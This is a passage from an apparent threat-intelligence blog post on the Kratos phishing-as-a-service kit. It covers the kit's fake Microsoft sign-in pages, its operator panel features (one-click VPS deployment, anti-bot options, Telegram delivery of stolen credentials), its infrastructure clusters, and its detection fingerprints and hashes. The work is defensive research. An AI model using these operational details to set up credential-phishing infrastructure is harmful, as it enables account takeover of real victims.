                                        TI Lookup query: SHA256:"a3c298ccf2456989ceb080e661b01c3b00445902ae7bb3e58dad4d846334ff9c" AND SHA256:"9d1a1a5e3b5e5de8a6c76ded7a01fa01709d426232b0048c9ee6ba0c5c1b8b42" AND SHA256:"cd231b895bbcd7154b81df1e065bf02f1ec667b920c8b6d23308cd509833b5ea"                      </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-343'>
table#wpdtSimpleTable-343{ table-layout: fixed !important; }
table#wpdtSimpleTable-343 td, table.wpdtSimpleTable343 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">Check&nbsp;relevant&nbsp;ANY.RUN&nbsp;sandbox&nbsp;sessions:&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/06aeed8c-62f6-4d45-abd2-9d6da7c299c9?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>V0: PTT/SOft</strong></a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/06aeed8c-62f6-4d45-abd2-9d6da7c299c9?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>V1:&nbsp;Dominant&nbsp;generation</strong></a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/e4afcbf8-2a7d-4154-ae97-dcd16928a21e?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>V2&nbsp;generation</strong></a>&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The evolution of Kratos’s disguise is easy to see. V0 presents itself as a <strong>“Secure File Access”</strong> page, shown in the screenshot below. It asks the victim to verify their email address to open a document, with a blurred Excel invoice displayed in the background.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sandbox-1024x578.webp" alt="Kratos analysis on sandbox" class="wp-image-22339" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sandbox-1024x578.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sandbox-300x169.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sandbox-768x434.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sandbox-370x209.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sandbox-270x152.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sandbox-740x418.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sandbox.webp 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>“Secure File Access” page displayed inside ANY.RUN sandbox</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Starting with V1, shown in the screenshot below, the kit moves to direct brand impersonation, closely replicating the Microsoft Sign In window. According to comments in the code, the goal of these changes was to make the page resemble Microsoft’s login window more closely and restructure the code to evade existing vendor signatures.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-fake-signin-webp-1024x578.webp" alt="Kratos analysis fake sign in" class="wp-image-22340" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-fake-signin-webp-1024x578.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-fake-signin-webp-300x169.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-fake-signin-webp-768x434.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-fake-signin-webp-370x209.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-fake-signin-webp-270x152.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-fake-signin-webp-740x418.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-fake-signin-webp.webp 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake Microsoft Sign In window</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Most importantly, the&nbsp;three generations appear to belong to the same Kratos service rather than&nbsp;three separate actors. The link between V1 and V2 is particularly strong at the operator level:&nbsp;</p>



<ul class="wp-block-list">
<li>The same domains, including&nbsp;razen[.]online,&nbsp;theoceanac[.]online,&nbsp;jumpast[.]es, and enerdizerandtron.de, serve both V1 and V2 pages.&nbsp;</li>



<li>The&nbsp;lg.svg&nbsp;file used in V1 is byte-for-byte identical to&nbsp;dsa.svg&nbsp;in V2.&nbsp;</li>



<li>A shared hash for the styles.css file, loaded by the fake&nbsp;<strong>Microsoft Sign In</strong>&nbsp;page, connects 636 tasks across both generations.&nbsp;</li>
</ul>



<p class="wp-block-paragraph">Check this&nbsp;TI&nbsp;Lookup&nbsp;query based on the&nbsp;lg.svg&nbsp;and styles.css hashes:&nbsp;</p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktolookup#{%22query%22:%22SHA256:%5C%22c447e75f1029ed7a5882add16bcd13ad44be3bd47c93c830ff39185e23d25ebb%5C%22%20AND%20SHA256:%5C%22cd231b895bbcd7154b81df1e065bf02f1ec667b920c8b6d23308cd509833b5ea%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">SHA256:&#8221;c447e75f1029ed7a5882add16bcd13ad44be3bd47c93c830ff39185e23d25ebb&#8221; AND SHA256:&#8221;cd231b895bbcd7154b81df1e065bf02f1ec667b920c8b6d23308cd509833b5ea&#8221;</a>&nbsp;</p>



<p class="wp-block-paragraph">Here is&nbsp;also&nbsp;an&nbsp;example of the V2 login page:&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-1024x578.webp" alt="V2 login page analyzed inside ANY.RUN’s sandbox" class="wp-image-22341" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-1024x578.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-300x169.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-768x434.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-370x209.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-270x152.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-740x418.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing.webp 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>V2 login page analyzed inside ANY.RUN’s sandbox</em></figcaption></figure>
</div>


<h2 class="wp-block-heading">The Investigation: How One Indicator Exposed the Entire Campaign</h2>



<p class="wp-block-paragraph">We started with the data already available to us: 156 analysis sessions that had been tagged as Kratos. After examining their network traffic in detail, we noticed that the browser loaded nearly the same setof page assets from the /assets/ directory on almost every landing page. Two files had particularly unusual names: <strong>barr.svg and res.css</strong>.</p>



<p class="wp-block-paragraph">The next step was simple but important: we checked how exclusively these files appeared together.</p>



<ul class="wp-block-list">
<li>barr.svg&nbsp;and&nbsp;lg.svg&nbsp;in&nbsp;the&nbsp;same&nbsp;session:&nbsp;<strong>1,397&nbsp;times</strong>&nbsp;</li>



<li>lg.svg&nbsp;without&nbsp;barr.svg:&nbsp;<strong>2&nbsp;times</strong>&nbsp;</li>



<li>barr.svg&nbsp;without&nbsp;lg.svg:&nbsp;<strong>12&nbsp;times</strong>&nbsp;</li>
</ul>



<p class="wp-block-paragraph">Even before our hunt, the ANY.RUN engine had already been detecting these pages with generic signatures. The numbers below refer to signature detections, not individual sessions:</p>



<ul class="wp-block-list">
<li>PHISHING [ANY.RUN]&nbsp;Generic&nbsp;Phishkit&nbsp;related&nbsp;URL&nbsp;chain&nbsp;observed&nbsp;(/assets/img/*) — 866&nbsp;</li>



<li>PHISHING [ANY.RUN]&nbsp;Generic&nbsp;Phishkit&nbsp;exfil&nbsp;activity&nbsp;observed&nbsp;(/next.php) — 232&nbsp;</li>



<li>PHISHING [ANY.RUN] Domain&nbsp;chain&nbsp;identified&nbsp;as&nbsp;Phishing&nbsp;(challengepoint) — 495&nbsp;</li>
</ul>



<p class="wp-block-paragraph">In other words, the activity had been detected all along, but only through generic <strong>Generic Phishkit</strong> signatures. The analysis sessions remained hidden within that broader category because they had not yetbeen attributed to a specific family. Our fingerprint closed this attribution gap by linking the generic phishing-kit activity to Kratos.</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-344"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="8"
           data-wpID="344"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Month (2026)                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Kratos V1 Sessions                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        January                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        93                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        February                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        90                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        March                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        217                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        April                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        221                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        May                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        373                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        June                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        393                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        July (partial)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        10                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-344'>
table#wpdtSimpleTable-344{ table-layout: fixed !important; }
table#wpdtSimpleTable-344 td, table.wpdtSimpleTable344 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">The current detection engine also includes Kratos-specific signatures, such as&nbsp;<strong>Kratos related URL chain&nbsp;observed</strong>,&nbsp;<strong>Kratos exfil activity</strong>, and&nbsp;<strong>Xbit&nbsp;Setter for&nbsp;barr.svg</strong>.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph">This enables security teams to run retrospective&nbsp;hunts,&nbsp;group related&nbsp;activity and&nbsp;create more&nbsp;accurate&nbsp;detection rules without relying on short-lived domains alone.&nbsp;</p>



<h2 class="wp-block-heading">Behind&nbsp;the&nbsp;Scenes:&nbsp;How&nbsp;the&nbsp;Kratos&nbsp;“Business”&nbsp;Operates&nbsp;</h2>



<p class="wp-block-paragraph">The&nbsp;sandbox&nbsp;reveals&nbsp;the&nbsp;victim&nbsp;side&nbsp;of&nbsp;the&nbsp;attack.&nbsp;But&nbsp;Kratos&nbsp;also&nbsp;has&nbsp;an&nbsp;operator-facing&nbsp;side,&nbsp;which&nbsp;we&nbsp;were&nbsp;able&nbsp;to&nbsp;investigate&nbsp;through&nbsp;OSINT.&nbsp;</p>



<h3 class="wp-block-heading">How&nbsp;We&nbsp;Located&nbsp;the&nbsp;Panel&nbsp;</h3>



<p class="wp-block-paragraph">Victim-side sandbox analysis does not expose the panel because it is designed for operators. However, every web panel has a favicon.</p>



<p class="wp-block-paragraph">By searching public internet indexes for services whose page titles contained the word <strong>Kratos</strong>, we identified a distinctive icon in the favicon results: a stylized Kratos logo. <br></p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="252" height="250" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kratos.webp" alt="kratos analysis" class="wp-image-22290" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kratos.webp 252w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kratos-150x150.webp 150w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kratos-70x70.webp 70w" sizes="auto, (max-width: 252px) 100vw, 252px" /></figure>
</div>


<p class="wp-block-paragraph">The icon led to active Kratos login panels displaying <strong>“© 2026 Kratos”</strong> and the message <strong>“Enter the realm of power.”</strong>This was an operator-side finding, not a conclusion drawn from victim-side sandbox data.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="614" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sign-in-1024x614.webp" alt="Active Kratos login panel " class="wp-image-22342" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sign-in-1024x614.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sign-in-300x180.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sign-in-768x461.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sign-in-1536x922.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sign-in-370x222.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sign-in-270x162.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sign-in-740x444.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-sign-in.webp 1780w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Active Kratos login panel</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">The service includes the following components, based on operator-side OSINT, public industry reports, and ANY.RUN research. The panel has been active since at least September 10, 2025:</p>



<ul class="wp-block-list">
<li><strong>Main domain:</strong>&nbsp;A central dashboard showing users and sales statistics.&nbsp;</li>



<li><strong>deploy.*&nbsp;subdomain:</strong>&nbsp;Used to deploy phishing domains to a VPS in just a few clicks. The panel’s&nbsp;component&nbsp;code shows that operators can:&nbsp;</li>



<li>Choose between a&nbsp;<strong>“PHP-based Office 365 page”</strong>, which uses a traditional PHP backend, and a&nbsp;<strong>“Node.js redirect server with anti-bot”</strong>, which functions as a reverse proxy with anti-bot protection and an admin dashboard.&nbsp;</li>



<li>Upload page files.&nbsp;</li>



<li>Install SSL certificates.&nbsp;</li>



<li>Modify DNS records.&nbsp;</li>



<li>Execute commands on the server.&nbsp;</li>



<li>Manage VPS status.&nbsp;</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="214" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-panel-code-1024x214.webp" alt="Kratos admin panel component code " class="wp-image-22345" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-panel-code-1024x214.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-panel-code-300x63.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-panel-code-768x160.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-panel-code-370x77.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-panel-code-270x56.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-panel-code-740x154.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-panel-code.webp 1481w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><br><em>Kratos admin panel component code with the option to select the type of phishing page</em></figcaption></figure>
</div>


<ul class="wp-block-list">
<li><strong>API&nbsp;component:</strong>&nbsp;The panel code directly exposes the following endpoints:&nbsp;/vps/* for CRUD operations, health checks, and cleanup, /domains/* for DNS verification, SSL installation, and SSL virtual host configuration&nbsp;</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="916" height="895" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-Panel.webp" alt="Kratos Admin Panel API Client Component Code" class="wp-image-22346" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-Panel.webp 916w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-Panel-300x293.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-Panel-768x750.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-Panel-370x362.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-Panel-270x264.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-admin-Panel-740x723.webp 740w" sizes="auto, (max-width: 916px) 100vw, 916px" /><figcaption class="wp-element-caption"><em>Kratos Admin Panel API Client Component Code</em></figcaption></figure>
</div>


<ul class="wp-block-list">
<li><strong>Data delivery settings:</strong> Operators can choose between a Telegram bot and email. Stolen data is packaged as JSON and sent to the attacker’s Telegram channel. This configuration is handled server-sideand is not visible in victim-side traffic.</li>



<li><strong>Anti-bot protection:</strong> Operators can choose between reCAPTCHA, Cloudflare Turnstile, and hCaptcha.</li>



<li><strong>Geographic restrictions:</strong> Country-based whitelisting is handled through geoplugin.net.</li>



<li><strong>Panel protection:</strong> The admin panel itself is protected with a master password and Telegram-based two-factor authentication.</li>
</ul>



<h2 class="wp-block-heading">Infrastructure&nbsp;and&nbsp;Affiliate&nbsp;Fingerprints&nbsp;</h2>



<p class="wp-block-paragraph">Kratos&nbsp;deployments&nbsp;fall&nbsp;into&nbsp;several&nbsp;clear&nbsp;clusters:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Newly registered, randomly named domains on low-cost TLDs</strong> such as .horse, .cfd, .sbs, .today, .fit, and .online: 235 deployments linked to disposable attacker infrastructure.</li>



<li><strong>Compromised legitimate websites</strong>, mainly German .de and Spanish .es domains, often running WordPress: 140 deployments. In these cases, the kit is usually placed in a subdirectory such as /factura/.</li>



<li><strong>*bgados* subdomains</strong>, derived from the Spanish word abogados (“lawyers”), suggesting a legal-themed lure.</li>



<li><strong>*files*&nbsp;and&nbsp;*docs*&nbsp;subdomains&nbsp;with&nbsp;64-character&nbsp;paths</strong>,&nbsp;associated&nbsp;with&nbsp;document-themed&nbsp;lures.&nbsp;</li>



<li><strong>Wildcard domains</strong> such as klenpare.com, uvarnix.cfd, and xavon.sbs, which rotate through randomly generated subdomains.</li>
</ul>



<p class="wp-block-paragraph">The front end is almost always hidden behind Cloudflare, while the actual origin infrastructure is hosted on standard cloud providers such as Azure, Google Cloud, and Host4Geeks.</p>



<p class="wp-block-paragraph">The infrastructure patterns suggest that several affiliates may be operating in parallel. Persistent tokens found in URL paths provide indirect evidence of these different affiliate fingerprints:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-345"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="7"
           data-wpID="345"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Token                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Sessions                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Meaning                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        factura                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        141                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Spanish/Portuguese for “invoice”                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        dgt                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        38                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Reference to Spain’s traffic authority                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Clbsrus / Svgclur                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        33 / 24                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Pattern associated with V2                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Suclers                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        25                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Distinctive token linked to the kit                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        paidoffice                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        23                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft 365-themed token                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        yhwh + elroi                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        20                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Biblical names that may indicate a specific campaign or operator style, but do not confirm actor attribution                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-345'>
table#wpdtSimpleTable-345{ table-layout: fixed !important; }
table#wpdtSimpleTable-345 td, table.wpdtSimpleTable345 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">It is important to note that this is proxy-based segmentation, not confirmed actor attribution. The true actor-level identifier, the Telegram bot or email address that receives the stolen data, is configured server-side through the same panel.</p>



<p class="wp-block-paragraph">Kratos also shares hosting infrastructure with other AiTM phishing kits, including Tycoon, Flowerstorm, Sneaky2FA, and EvilProxy. The same VPS servers, and sometimes even the same SharePoint pages, mayhost vax/qen DGA families, Spanish-language kits, and other campaigns behind the same Cloudflare infrastructure.</p>



<p class="wp-block-paragraph">However, their code is different, and neighboring domains do not serve barr.svg. At the analysis level, there is no overlap between Kratos tags and these other families.</p>



<p class="wp-block-paragraph">A shared IP address confirms co-hosting, but it does not prove that the campaigns are operated by the same actor. Kratos should therefore be tagged only when its asset pattern is present. Otherwise, unrelated campaigns may be incorrectly attributed to the family.</p>



<h2 class="wp-block-heading">How&nbsp;to&nbsp;Detect&nbsp;Kratos: Ready-to-Use&nbsp;Detection&nbsp;Methods&nbsp;</h2>



<p class="wp-block-paragraph">Kratos&nbsp;can&nbsp;be&nbsp;identified&nbsp;through&nbsp;a&nbsp;combination&nbsp;of&nbsp;asset&nbsp;fingerprints,&nbsp;content&nbsp;hashes,&nbsp;exfiltration&nbsp;endpoints,&nbsp;engine&nbsp;signatures,&nbsp;and&nbsp;browser-level&nbsp;behavior.&nbsp;</p>



<h3 class="wp-block-heading"><strong>1. Asset&nbsp;Fingerprint</strong>&nbsp;</h3>



<p class="wp-block-paragraph">This&nbsp;is&nbsp;the&nbsp;primary&nbsp;detection&nbsp;method,&nbsp;with&nbsp;90%&nbsp;recall&nbsp;and&nbsp;a&nbsp;false-positive&nbsp;rate&nbsp;close&nbsp;to&nbsp;zero&nbsp;in&nbsp;negative-control&nbsp;testing.&nbsp;</p>



<ul class="wp-block-list">
<li><strong>V1:</strong>&nbsp;HTTP requests to both */assets/img/barr.svg&nbsp;and */assets/img/lg.svg&nbsp;within the same&nbsp;sandbox&nbsp;analysis session&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>V2:</strong>&nbsp;HTTP&nbsp;requests&nbsp;to&nbsp;*dsa.svg, *sid.gif,&nbsp;and&nbsp;*imag.jpg&nbsp;within&nbsp;the&nbsp;same&nbsp;session&nbsp;</li>
</ul>



<h3 class="wp-block-heading"><strong>2. Asset Content&nbsp;Hashes</strong>&nbsp;</h3>



<p class="wp-block-paragraph">These&nbsp;hashes&nbsp;remain&nbsp;useful&nbsp;even&nbsp;when&nbsp;the&nbsp;files&nbsp;are&nbsp;renamed:&nbsp;</p>



<ul class="wp-block-list">
<li>lg.svg&nbsp;&nbsp;&nbsp;&nbsp; = cd231b895bbcd7154b81df1e065bf02f1ec667b920c8b6d23308cd509833b5ea&nbsp;</li>



<li>barr.svg&nbsp;&nbsp; = 949895df17148c5ea29f190d2619a14b3ec648425b9cc3c5a1423553c16f3898&nbsp;</li>



<li>ani.gif&nbsp;&nbsp;&nbsp; = 9d1a1a5e3b5e5de8a6c76ded7a01fa01709d426232b0048c9ee6ba0c5c1b8b42&nbsp;</li>



